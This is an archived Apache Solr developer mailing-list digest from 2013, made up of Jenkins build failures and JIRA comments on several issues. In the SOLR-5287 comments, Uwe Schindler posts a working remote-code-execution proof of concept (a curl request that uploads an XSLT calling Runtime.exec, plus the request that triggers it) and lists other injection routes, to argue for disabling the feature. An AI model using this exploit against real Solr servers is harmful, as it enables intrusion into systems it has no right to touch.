>  The following error occurred while executing this line:
> /usr/home/hudson/hudson-slave/workspace/Lucene-Artifacts-trunk/solr/common-build.xml:441:
>  The following error occurred while executing this line:
> /usr/home/hudson/hudson-slave/workspace/Lucene-Artifacts-trunk/solr/contrib/solr-morphlines-core/build.xml:100:
>  impossible to resolve dependencies:
>   resolve failed - see output for details
> 
> Total time: 8 minutes 36 seconds
> Build step 'Invoke Ant' marked build as failure
> Archiving artifacts
> Publishing Javadoc
> Email was triggered for: Failure
> Sending email for trigger: Failure
> 
> 
> 
> -
> To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
> For additional commands, e-mail: dev-h...@lucene.apache.org


-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[JENKINS] Lucene-Artifacts-trunk - Build # 2466 - Failure

2013-12-02 Thread Apache Jenkins Server
Build: https://builds.apache.org/job/Lucene-Artifacts-trunk/2466/

No tests ran.

Build Log:
[...truncated 13197 lines...]
BUILD FAILED
/usr/home/hudson/hudson-slave/workspace/Lucene-Artifacts-trunk/lucene/build.xml:499:
 The following error occurred while executing this line:
/usr/home/hudson/hudson-slave/workspace/Lucene-Artifacts-trunk/build.xml:98: 
The following error occurred while executing this line:
/usr/home/hudson/hudson-slave/workspace/Lucene-Artifacts-trunk/solr/build.xml:535:
 The following error occurred while executing this line:
/usr/home/hudson/hudson-slave/workspace/Lucene-Artifacts-trunk/solr/common-build.xml:441:
 The following error occurred while executing this line:
/usr/home/hudson/hudson-slave/workspace/Lucene-Artifacts-trunk/solr/contrib/solr-morphlines-core/build.xml:100:
 impossible to resolve dependencies:
resolve failed - see output for details

Total time: 8 minutes 36 seconds
Build step 'Invoke Ant' marked build as failure
Archiving artifacts
Publishing Javadoc
Email was triggered for: Failure
Sending email for trigger: Failure



-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org

[jira] [Commented] (SOLR-5287) Allow at least solrconfig.xml and schema.xml to be edited via the admin screen

2013-12-02 Thread Mark Miller (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-5287?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13836802#comment-13836802
 ] 

Mark Miller commented on SOLR-5287:
---

bq. It's the implementation of that feature in this issue that has exploits it 
should not have?

Yes.

> Allow at least solrconfig.xml and schema.xml to be edited via the admin screen
> --
>
> Key: SOLR-5287
> URL: https://issues.apache.org/jira/browse/SOLR-5287
> Project: Solr
>  Issue Type: Improvement
>  Components: Schema and Analysis, web gui
>Affects Versions: 4.5, 5.0
>Reporter: Erick Erickson
>Assignee: Erick Erickson
>Priority: Blocker
> Fix For: 5.0, 4.7
>
> Attachments: SOLR-5287.patch, SOLR-5287.patch, SOLR-5287.patch, 
> SOLR-5287.patch, SOLR-5287.patch
>
>
> A user asking a question on the Solr list got me to thinking about editing 
> the main config files from the Solr admin screen. I chatted briefly with 
> [~steffkes] about the mechanics of this on the browser side, he doesn't see a 
> problem on that end. His comment is there's no end point that'll write the 
> file back.
> Am I missing something here or is this actually not a hard problem? I see a 
> couple of issues off the bat, neither of which seem troublesome.
> 1> file permissions. I'd imagine lots of installations will get file 
> permission exceptions if Solr tries to write the file out. Well, do a 
> chmod/chown.
> 2> screwing up the system maliciously or not. I don't think this is an issue, 
> this would be part of the admin handler after all.
> Does anyone have objections to the idea? And how does this fit into the work 
> that [~sar...@syr.edu] has been doing?
> I can imagine this extending to SolrCloud with a "push this to ZK" option or 
> something like that, perhaps not in V1 unless it's easy.
> Of course any pointers gratefully received. Especially ones that start with 
> "Don't waste your effort, it'll never work (or be accepted)"...
> Because what scares me is this seems like such an easy thing to do that would 
> be a significant ease-of-use improvement, so there _has_ to be something I'm 
> missing.
> So if we go forward with this we'll make this the umbrella JIRA, the two 
> immediate sub-JIRAs that spring to mind will be the UI work and the endpoints 
> for the UI work to use.
> I think there are only two end-points here
> 1> list all the files in the conf (or arbitrary from /collection) 
> directory.
> 2> write this text to this file
> Possibly later we could add "clone the configs from coreX to coreY".
> BTW, I've assigned this to myself so I don't lose it, but if anyone wants to 
> take it over it won't hurt my feelings a bit



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[jira] [Commented] (SOLR-1301) Add a Solr contrib that allows for building Solr indexes via Hadoop's Map-Reduce.

2013-12-02 Thread ASF subversion and git services (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-1301?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13836768#comment-13836768
 ] 

ASF subversion and git services commented on SOLR-1301:
---

Commit 1547139 from [~markrmil...@gmail.com] in branch 'dev/trunk'
[ https://svn.apache.org/r1547139 ]

SOLR-1301: Add a Solr contrib that allows for building Solr indexes via 
Hadoop's MapReduce.

> Add a Solr contrib that allows for building Solr indexes via Hadoop's 
> Map-Reduce.
> -
>
> Key: SOLR-1301
> URL: https://issues.apache.org/jira/browse/SOLR-1301
> Project: Solr
>  Issue Type: New Feature
>Reporter: Andrzej Bialecki 
>Assignee: Mark Miller
> Fix For: 5.0, 4.7
>
> Attachments: README.txt, SOLR-1301-hadoop-0-20.patch, 
> SOLR-1301-hadoop-0-20.patch, SOLR-1301-maven-intellij.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, SOLR-1301.patch, 
> SOLR-1301.patch, SolrRecordWriter.java, commons-logging-1.0.4.jar, 
> commons-logging-api-1.0.4.jar, hadoop-0.19.1-core.jar, 
> hadoop-0.20.1-core.jar, hadoop-core-0.20.2-cdh3u3.jar, hadoop.patch, 
> log4j-1.2.15.jar
>
>
> This patch contains a contrib module that provides distributed indexing 
> (using Hadoop) to Solr EmbeddedSolrServer. The idea behind this module is 
> twofold:
> * provide an API that is familiar to Hadoop developers, i.e. that of 
> OutputFormat
> * avoid unnecessary export and (de)serialization of data maintained on HDFS. 
> SolrOutputFormat consumes data produced by reduce tasks directly, without 
> storing it in intermediate files. Furthermore, by using an 
> EmbeddedSolrServer, the indexing task is split into as many parts as there 
> are reducers, and the data to be indexed is not sent over the network.
> Design
> --
> Key/value pairs produced by reduce tasks are passed to SolrOutputFormat, 
> which in turn uses SolrRecordWriter to write this data. SolrRecordWriter 
> instantiates an EmbeddedSolrServer, and it also instantiates an 
> implementation of SolrDocumentConverter, which is responsible for turning 
> Hadoop (key, value) into a SolrInputDocument. This data is then added to a 
> batch, which is periodically submitted to EmbeddedSolrServer. When the reduce 
> task completes and the OutputFormat is closed, SolrRecordWriter calls 
> commit() and optimize() on the EmbeddedSolrServer.
> The API provides facilities to specify an arbitrary existing solr.home 
> directory, from which the conf/ and lib/ files will be taken.
> This process results in the creation of as many partial Solr home directories 
> as there were reduce tasks. The output shards are placed in the output 
> directory on the default filesystem (e.g. HDFS). Such part-N directories 
> can be used to run N shard servers. Additionally, users can specify the 
> number of reduce tasks, in particular 1 reduce task, in which case the output 
> will consist of a single shard.
> An example application is provided that processes large CSV files and uses 
> this API. It uses custom CSV processing to avoid (de)serialization overhead.
> This patch relies on hadoop-core-0.19.1.jar - I attached the jar to this 
> issue, you should put it in contrib/hadoop/lib.
> Note: the development of this patch was sponsored by an anonymous contributor 
> and approved for release under Apache License.



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[jira] [Comment Edited] (SOLR-5287) Allow at least solrconfig.xml and schema.xml to be edited via the admin screen

2013-12-02 Thread Uwe Schindler (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-5287?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13836061#comment-13836061
 ] 

Uwe Schindler edited comment on SOLR-5287 at 12/2/13 5:46 PM:
--

Hi,
FYI, I created a proof of concept showing why enabling this by default is bad:

First, after reading the [blog 
post|http://www.agarri.fr/kom/archives/2013/11/27/compromising_an_unreachable_solr_server_with_cve-2013-6397/index.html],
 you might think you need to actually POST to the handler, which is not 
possible via XXE. But as Solr allows passing a content stream through the URL 
query string, your system is wide open for writing files even when you can 
only do GET requests. Here is the example that uploads the file from the above 
blog post as {{xslt/test.xsl}}. This file has Java code embedded that starts 
{{calc.exe}} on Windows systems:
{noformat}
> curl 
> 'http://localhost:8983/solr/collection1/admin/file?file=xslt/test.xsl&contentType=text/xml;charset=utf-8&op=write&stream.body=%3Cxsl%3Astylesheet%20version%3D%221.0%22%0A%20%20%20%20xmlns%3Axsl%3D%22http%3A%2F%2Fwww.w3.org%2F1999%2FXSL%2FTransform%22%0A%20%20%20%20xmlns%3Art%3D%22http%3A%2F%2Fxml.apache.org%2Fxalan%2Fjava%2Fjava.lang.Runtime%22%3E%0A%0A%20%20%3Cxsl%3Aoutput%20method%3D%22text%22%2F%3E%0A%0A%20%20%3Cxsl%3Atemplate%20match%3D%22%2F%22%3E%0A%20%20%20%3Cxsl%3Avariable%20name%3D%22cmd%22%3E%3C!%5BCDATA%5Bcalc.exe%5D%5D%3E%3C%2Fxsl%3Avariable%3E%0A%20%20%20%3Cxsl%3Avariable%20name%3D%22rtObj%22%20select%3D%22rt%3AgetRuntime()%22%2F%3E%0A%20%20%20%3Cxsl%3Avariable%20name%3D%22process%22%20select%3D%22rt%3Aexec(%24rtObj%2C%20%24cmd)%22%2F%3E%0A%20%20%20%3Cxsl%3Atext%3EProcess%20started%3A%20%3C%2Fxsl%3Atext%3E%3Cxsl%3Avalue-of%20select%3D%22%24process%22%2F%3E%0A%20%20%3C%2Fxsl%3Atemplate%3E%0A%3C%2Fxsl%3Astylesheet%3E'
{noformat}

This is the file uploaded by the command above (on my Windows system it opens 
the Windows calculator {{calc.exe}}; modify for Linux, or use other Windows 
commands to format your hard disk):

{code:xml}
<xsl:stylesheet version="1.0"
    xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
    xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime">

  <xsl:output method="text"/>

  <xsl:template match="/">
   <xsl:variable name="cmd"><![CDATA[calc.exe]]></xsl:variable>
   <xsl:variable name="rtObj" select="rt:getRuntime()"/>
   <xsl:variable name="process" select="rt:exec($rtObj, $cmd)"/>
   <xsl:text>Process started: </xsl:text><xsl:value-of select="$process"/>
  </xsl:template>
</xsl:stylesheet>
{code}

If you want to edit the file and create the correctly encoded stream.body URL 
param, you can use this tool: http://meyerweb.com/eric/tools/dencoder/

If you then execute the newly created XSL file in your xslt config directory, 
the Windows calculator opens on your desktop -- booom!:

{noformat}
> curl 'http://localhost:8983/solr/select/?q=*:*&wt=xslt&tr=test.xsl'
Process started: java.lang.ProcessImpl@73e71ddf
{noformat}

This is the reason why this *must* be disabled by default. Allowing arbitrary 
files containing active content to be uploaded to the Solr server with only a 
GET request cannot be the default. GET requests can be triggered by even the 
smallest leaks in your firewall (as explained in the blog above).


was (Author: thetaphi):
Hi,
FYI, I created a proof of concept showing why enabling this by default is bad:

First, after reading the blog post at http://www.agarri.fr/blog/, you might 
think you need to actually POST to the handler, which is not possible via XXE. 
But as Solr allows passing a content stream through the URL query string, 
your system is wide open for writing files even when you can only do GET 
requests. Here is the example that uploads the file from the above blog post as 
{{xslt/test.xsl}}. This file has Java code embedded that starts {{calc.exe}} on 
Windows systems:
{noformat}
> curl 
> 'http://localhost:8983/solr/collection1/admin/file?file=xslt/test.xsl&contentType=text/xml;charset=utf-8&op=write&stream.body=%3Cxsl%3Astylesheet%20version%3D%221.0%22%0A%20%20%20%20xmlns%3Axsl%3D%22http%3A%2F%2Fwww.w3.org%2F1999%2FXSL%2FTransform%22%0A%20%20%20%20xmlns%3Art%3D%22http%3A%2F%2Fxml.apache.org%2Fxalan%2Fjava%2Fjava.lang.Runtime%22%3E%0A%0A%20%20%3Cxsl%3Aoutput%20method%3D%22text%22%2F%3E%0A%0A%20%20%3Cxsl%3Atemplate%20match%3D%22%2F%22%3E%0A%20%20%20%3Cxsl%3Avariable%20name%3D%22cmd%22%3E%3C!%5BCDATA%5Bcalc.exe%5D%5D%3E%3C%2Fxsl%3Avariable%3E%0A%20%20%20%3Cxsl%3Avariable%20name%3D%22rtObj%22%20select%3D%22rt%3AgetRuntime()%22%2F%3E%0A%20%20%20%3Cxsl%3Avariable%20name%3D%22process%22%20select%3D%22rt%3Aexec(%24rtObj%2C%20%24cmd)%22%2F%3E%0A%20%20%20%3Cxsl%3Atext%3EProcess%20started%3A%20%3C%2Fxsl%3Atext%3E%3Cxsl%3Avalue-of%20select%3D%22%24process%22%2F%3E%0A%20%20%3C%2Fxsl%3Atemplate%3E%0A%3C%2Fxsl%3Astylesheet%3E'
{noformat}

This is the file uploaded by the command above (on my Windows system it opens 
the Windows calculator {{calc.exe}}; modify for Linux, or use other Windows 
commands to format your hard disk):

{code:xml}
<xsl:stylesheet version="1.0"
    xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
    xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime">

  <xsl:output method="text"/>

  <xsl:template match="/">
   <xsl:variable name="cmd"><![CDATA[calc.exe]]></xsl:variable>
   <xsl:variable name="rtObj" select="rt:getRuntime()"/>
   <xsl:variable name="process" select="rt:exec($rtObj, $cmd)"/>
   <xsl:text>Process started: </xsl:text><xsl:value-of select="$process"/>
  </xsl:template>
</xsl:stylesheet>
{code}

If you want to edit the file and create the correctly encoded stream.body URL 
param, you can use this tool: http://meyerweb.com/eric/tools/dencoder/

[jira] [Comment Edited] (SOLR-5287) Allow at least solrconfig.xml and schema.xml to be edited via the admin screen

2013-12-02 Thread Uwe Schindler (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-5287?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13836068#comment-13836068
 ] 

Uwe Schindler edited comment on SOLR-5287 at 12/2/13 5:45 PM:
--

You can also upload a whole shell script to your config dir with a single GET 
request using stream.body and then execute it with the above XSL. There 
is no limit; you can do whatever you like :-)

In addition, the XSL hack used here is not the only way to use the new 
"solr file manager" to inject code:
- You can use the file manager to upload javascript files into the DIH folder 
and execute them later through DIH
- You can use the file manager to upload javascript files to the config dir and 
then use them in the UpdateRequestHandler through 
[ScriptUpdateProcessor|http://wiki.apache.org/solr/ScriptUpdateProcessor]. This 
is not enabled by default, but you can also upload a new solrconfig.xml through 
this handler and enable this, even with a GET request!!!

As Javascript (or any other scripting language) is running in Solr's JVM, you 
have access to the whole Solr API from the viewpoint of the Solr Update Request 
Handler / DIH.

The above PoC just shows the easiest way to use this hole.


was (Author: thetaphi):
You can also upload a whole shell script to your config dir with a single GET 
request using stream.body and then execute it with the above XSL. There 
is no limit; you can do whatever you like :-)

> Allow at least solrconfig.xml and schema.xml to be edited via the admin screen
> --
>
> Key: SOLR-5287
> URL: https://issues.apache.org/jira/browse/SOLR-5287
> Project: Solr
>  Issue Type: Improvement
>  Components: Schema and Analysis, web gui
>Affects Versions: 4.5, 5.0
>Reporter: Erick Erickson
>Assignee: Erick Erickson
>Priority: Blocker
> Fix For: 5.0, 4.7
>
> Attachments: SOLR-5287.patch, SOLR-5287.patch, SOLR-5287.patch, 
> SOLR-5287.patch, SOLR-5287.patch
>
>
> A user asking a question on the Solr list got me to thinking about editing 
> the main config files from the Solr admin screen. I chatted briefly with 
> [~steffkes] about the mechanics of this on the browser side, he doesn't see a 
> problem on that end. His comment is there's no end point that'll write the 
> file back.
> Am I missing something here or is this actually not a hard problem? I see a 
> couple of issues off the bat, neither of which seem troublesome.
> 1> file permissions. I'd imagine lots of installations will get file 
> permission exceptions if Solr tries to write the file out. Well, do a 
> chmod/chown.
> 2> screwing up the system maliciously or not. I don't think this is an issue, 
> this would be part of the admin handler after all.
> Does anyone have objections to the idea? And how does this fit into the work 
> that [~sar...@syr.edu] has been doing?
> I can imagine this extending to SolrCloud with a "push this to ZK" option or 
> something like that, perhaps not in V1 unless it's easy.
> Of course any pointers gratefully received. Especially ones that start with 
> "Don't waste your effort, it'll never work (or be accepted)"...
> Because what scares me is this seems like such an easy thing to do that would 
> be a significant ease-of-use improvement, so there _has_ to be something I'm 
> missing.
> So if we go forward with this we'll make this the umbrella JIRA, the two 
> immediate sub-JIRAs that spring to mind will be the UI work and the endpoints 
> for the UI work to use.
> I think there are only two end-points here
> 1> list all the files in the conf (or arbitrary from /collection) 
> directory.
> 2> write this text to this file
> Possibly later we could add "clone the configs from coreX to coreY".
> BTW, I've assigned this to myself so I don't lose it, but if anyone wants to 
> take it over it won't hurt my feelings a bit



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[jira] [Commented] (SOLR-5474) Have a new mode for SolrJ to not watch any ZKNode

2013-12-02 Thread Noble Paul (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-5474?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13836718#comment-13836718
 ] 

Noble Paul commented on SOLR-5474:
--

Before updating the cache it should check the version of "state" for that 
collection. If it finds that the version has actually not changed, it should 
just continue talking to other nodes in the shard and not invalidate the cache.
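
A rough sketch of that version check (all names here are invented for 
illustration; the actual SolrJ code would differ):

{code:java}
import java.util.Map;
import java.util.concurrent.ConcurrentHashMap;

// Hypothetical version-guarded invalidation: only drop the cached state
// when ZK actually reports a newer version of the collection's state.json.
public class CollectionStateCache {
  static final class Entry {
    final int zkVersion;  // version of /collections/<coll>/state.json
    final Object state;   // parsed state for the collection
    Entry(int zkVersion, Object state) { this.zkVersion = zkVersion; this.state = state; }
  }

  private final Map<String, Entry> cache = new ConcurrentHashMap<>();

  /** Called when a node rejected a request with INVALID_NODE. */
  public void onInvalidNode(String collection, int versionInZk) {
    Entry cached = cache.get(collection);
    if (cached != null && cached.zkVersion == versionInZk) {
      return;  // version unchanged: keep the cache, try other nodes in the shard
    }
    cache.remove(collection);  // stale: force a re-fetch of state.json
  }
}
{code}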

> Have a new mode for SolrJ to not watch any ZKNode
> -
>
> Key: SOLR-5474
> URL: https://issues.apache.org/jira/browse/SOLR-5474
> Project: Solr
>  Issue Type: Sub-task
>  Components: SolrCloud
>Reporter: Noble Paul
>
> In this mode SolrJ would not watch any ZK node.
> It fetches the state on demand and caches the most recently used n 
> collections in memory.
> SolrJ would not listen to any ZK node. When a request comes for a collection 
> ‘xcoll’,
> it would first check if such a collection exists.
> If yes, it first looks up the details in the local cache for that collection.
> If not found in the cache, it fetches the node /collections/xcoll/state.json 
> and caches the information.
> Any query/update will be sent with an extra query param specifying the 
> collection name, shard name, Role (Leader/Replica), and range (example 
> \_target_=xcoll:shard1:L:8000-b332). A node would throw an error 
> (INVALID_NODE) if it does not serve the collection/shard/Role/range combo.
> If SolrJ gets an INVALID_NODE error it would invalidate the cache and fetch 
> fresh state information for that collection (and cache it again).
> If there is a connection timeout, SolrJ assumes the node is down, re-fetches 
> the state for the collection, and tries again.



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[jira] [Comment Edited] (SOLR-5287) Allow at least solrconfig.xml and schema.xml to be edited via the admin screen

2013-12-02 Thread Uwe Schindler (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-5287?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13836696#comment-13836696
 ] 

Uwe Schindler edited comment on SOLR-5287 at 12/2/13 5:38 PM:
--

The commit in this issue is the problematic one. The other issues to be 
reverted are just "usage" of this new API in the admin interface. If we remove 
that feature from the 4.x branch, we have to remove the admin screens for it, 
too.

[~steve_rowe]'s answer was just for [~erickerickson] and me, because we wanted 
to confirm that the schema editing API does not have some "file manager" 
functionality, so you can inject code into solr's config or templates or 
whatever.


was (Author: thetaphi):
The commit in this issue is the problematic one. The other issues to be 
reverted are just "usage" of this new API in the admin interface. If we remove 
that feature from the 4.x branch, we have to remove the admin screens for it, 
too.

> Allow at least solrconfig.xml and schema.xml to be edited via the admin screen
> --
>
> Key: SOLR-5287
> URL: https://issues.apache.org/jira/browse/SOLR-5287
> Project: Solr
>  Issue Type: Improvement
>  Components: Schema and Analysis, web gui
>Affects Versions: 4.5, 5.0
>Reporter: Erick Erickson
>Assignee: Erick Erickson
>Priority: Blocker
> Fix For: 5.0, 4.7
>
> Attachments: SOLR-5287.patch, SOLR-5287.patch, SOLR-5287.patch, 
> SOLR-5287.patch, SOLR-5287.patch
>
>
> A user asking a question on the Solr list got me to thinking about editing 
> the main config files from the Solr admin screen. I chatted briefly with 
> [~steffkes] about the mechanics of this on the browser side, he doesn't see a 
> problem on that end. His comment is there's no end point that'll write the 
> file back.
> Am I missing something here or is this actually not a hard problem? I see a 
> couple of issues off the bat, neither of which seem troublesome.
> 1> file permissions. I'd imagine lots of installations will get file 
> permission exceptions if Solr tries to write the file out. Well, do a 
> chmod/chown.
> 2> screwing up the system maliciously or not. I don't think this is an issue, 
> this would be part of the admin handler after all.
> Does anyone have objections to the idea? And how does this fit into the work 
> that [~sar...@syr.edu] has been doing?
> I can imagine this extending to SolrCloud with a "push this to ZK" option or 
> something like that, perhaps not in V1 unless it's easy.
> Of course any pointers gratefully received. Especially ones that start with 
> "Don't waste your effort, it'll never work (or be accepted)"...
> Because what scares me is this seems like such an easy thing to do that would 
> be a significant ease-of-use improvement, so there _has_ to be something I'm 
> missing.
> So if we go forward with this we'll make this the umbrella JIRA, the two 
> immediate sub-JIRAs that spring to mind will be the UI work and the endpoints 
> for the UI work to use.
> I think there are only two end-points here
> 1> list all the files in the conf (or arbitrary from /collection) 
> directory.
> 2> write this text to this file
> Possibly later we could add "clone the configs from coreX to coreY".
> BTW, I've assigned this to myself so I don't lose it, but if anyone wants to 
> take it over it won't hurt my feelings a bit



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[jira] [Commented] (SOLR-5518) Move editing config files into a new handler

2013-12-02 Thread Uwe Schindler (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-5518?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13836706#comment-13836706
 ] 

Uwe Schindler commented on SOLR-5518:
-

bq. I'm not sure if there's a need to remove the "Files" Page completely, since 
browsing the available files would be possible w/o the write-stuff anyway? 
maybe just removing the "modify" functionality but leave the rest "as is"?

I am fine with that! So we should revert SOLR-5287 in branch_4x, remove the 
"Modify /new File" button from admin UI, and all should be fine.

The current code should be committed to trunk only, and we open other issues to 
add "security" to the admin request handlers before providing them to users in 
a stable branch. This is all too half-baked; I don't want to risk Solr's good 
standing by merging this to a stable branch. A "file manager" in Solr is way 
too much for a stable branch, especially if it has no security at all.

> Move editing config files into a new handler
> 
>
> Key: SOLR-5518
> URL: https://issues.apache.org/jira/browse/SOLR-5518
> Project: Solr
>  Issue Type: Improvement
>Affects Versions: 5.0, 4.7
>Reporter: Erick Erickson
>Assignee: Erick Erickson
>Priority: Blocker
> Attachments: SOLR-5518.patch, SOLR-5518.patch
>
>
> See SOLR-5287. Uwe Schindler pointed out that writing files the way 5287 does 
> it is a security vulnerability and that disabling it should be the norm. Subsequent 
> discussion came up with this idea.
> Writing arbitrary config files should NOT be on by default.
> We'll also incorporate Mark's idea of testing XML files before writing 
> anywhere.



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[jira] [Updated] (SOLR-5473) Make one state.json per collection

2013-12-02 Thread Noble Paul (JIRA)

 [ 
https://issues.apache.org/jira/browse/SOLR-5473?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Noble Paul updated SOLR-5473:
-

Attachment: SOLR-5473.patch

> Make one state.json per collection
> --
>
> Key: SOLR-5473
> URL: https://issues.apache.org/jira/browse/SOLR-5473
> Project: Solr
>  Issue Type: Sub-task
>  Components: SolrCloud
>Reporter: Noble Paul
>Assignee: Noble Paul
> Attachments: SOLR-5473.patch, SOLR-5473.patch
>
>
> As defined in the parent issue, store the states of each collection under 
> /collections/collectionname/state.json node
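
For illustration only, a plain ZooKeeper client can read the per-collection 
node described here (connection string and collection name are placeholders; 
the actual Solr code goes through ZkStateReader):

{code:java}
import java.nio.charset.StandardCharsets;
import org.apache.zookeeper.ZooKeeper;
import org.apache.zookeeper.data.Stat;

public class ReadCollectionState {
  public static void main(String[] args) throws Exception {
    ZooKeeper zk = new ZooKeeper("localhost:2181", 15000, null);
    Stat stat = new Stat();
    // One state.json per collection, as proposed in this issue.
    byte[] data = zk.getData("/collections/xcoll/state.json", false, stat);
    System.out.println("zk version: " + stat.getVersion());
    System.out.println(new String(data, StandardCharsets.UTF_8));
    zk.close();
  }
}
{code}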



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[jira] [Commented] (SOLR-5287) Allow at least solrconfig.xml and schema.xml to be edited via the admin screen

2013-12-02 Thread Uwe Schindler (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-5287?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13836696#comment-13836696
 ] 

Uwe Schindler commented on SOLR-5287:
-

The commit in this issue is the problematic one. The other issues to be 
reverted are just "usage" of this new API in the admin interface. If we remove 
that feature from the 4.x branch, we have to remove the admin screens for it, 
too.

> Allow at least solrconfig.xml and schema.xml to be edited via the admin screen
> --
>
> Key: SOLR-5287
> URL: https://issues.apache.org/jira/browse/SOLR-5287
> Project: Solr
>  Issue Type: Improvement
>  Components: Schema and Analysis, web gui
>Affects Versions: 4.5, 5.0
>Reporter: Erick Erickson
>Assignee: Erick Erickson
>Priority: Blocker
> Fix For: 5.0, 4.7
>
> Attachments: SOLR-5287.patch, SOLR-5287.patch, SOLR-5287.patch, 
> SOLR-5287.patch, SOLR-5287.patch
>
>
> A user asking a question on the Solr list got me to thinking about editing 
> the main config files from the Solr admin screen. I chatted briefly with 
> [~steffkes] about the mechanics of this on the browser side, he doesn't see a 
> problem on that end. His comment is there's no end point that'll write the 
> file back.
> Am I missing something here or is this actually not a hard problem? I see a 
> couple of issues off the bat, neither of which seem troublesome.
> 1> file permissions. I'd imagine lots of installations will get file 
> permission exceptions if Solr tries to write the file out. Well, do a 
> chmod/chown.
> 2> screwing up the system maliciously or not. I don't think this is an issue, 
> this would be part of the admin handler after all.
> Does anyone have objections to the idea? And how does this fit into the work 
> that [~sar...@syr.edu] has been doing?
> I can imagine this extending to SolrCloud with a "push this to ZK" option or 
> something like that, perhaps not in V1 unless it's easy.
> Of course any pointers gratefully received. Especially ones that start with 
> "Don't waste your effort, it'll never work (or be accepted)"...
> Because what scares me is this seems like such an easy thing to do that would 
> be a significant ease-of-use improvement, so there _has_ to be something I'm 
> missing.
> So if we go forward with this we'll make this the umbrella JIRA, the two 
> immediate sub-JIRAs that spring to mind will be the UI work and the endpoints 
> for the UI work to use.
> I think there are only two end-points here
> 1> list all the files in the conf (or arbitrary from /collection) 
> directory.
> 2> write this text to this file
> Possibly later we could add "clone the configs from coreX to coreY".
> BTW, I've assigned this to myself so I don't lose it, but if anyone wants to 
> take it over it won't hurt my feelings a bit



--
This message was sent by Atlassian JIRA
(v6.1#6144)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[jira] [Commented] (SOLR-5477) Async execution of OverseerCollectionProcessor tasks

2013-12-02 Thread Anshum Gupta (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-5477?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13836658#comment-13836658
 ] 

Anshum Gupta commented on SOLR-5477:


Here's what I'd recommend. 

Have 3 queues in the first phase of implementation, one each for submitted, 
running, and completed tasks. The completed queue only keeps the top-X tasks (by 
recency of completion). The completed queue is important for people to figure out 
details about a completed task, e.g. completion time, running time, etc.

I've started working on it and would recommend that we have a ThreadPool for 
the running tasks. This can be capped at a config setting.

I am still debating when to accept tasks (or perhaps accept everything 
and fail them when they run). Here's a sample case on that. Firing a Shard 
split for collection1/shard1 would lead to an inactive shard1. If we continue 
to accept tasks until this completes, we may accept actions that involve 
shard1. We may need to take a call on that.

For now, I am not looking at truly multi-threading my implementation (but 
certainly doing that before having this particular JIRA resolved). Once I 
get to it, I'd perhaps still just run only one request per collection at a 
time, until we have a more complex decision making capability.

Once a task is submitted, the OverseerCollectionProcessor peeks and processes 
tasks which are in the submitted queue and moves them to in-process. We'll have 
to synchronize this task on the queue/collection.

Upon completion, again the task is moved from the in-progress queue to the 
completed queue.

Cleaning up of the completed queue could also be tricky and we may need a 
failed tasks queue or have a way to perhaps retain failed tasks in the 
completed queue longer.
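
A bare-bones, in-memory sketch of the three-queue flow described above (names 
and capacities are invented here; the real implementation would back these 
with ZK queues, not Java collections):

{code:java}
import java.util.Deque;
import java.util.Map;
import java.util.concurrent.ConcurrentHashMap;
import java.util.concurrent.ConcurrentLinkedDeque;
import java.util.concurrent.ExecutorService;
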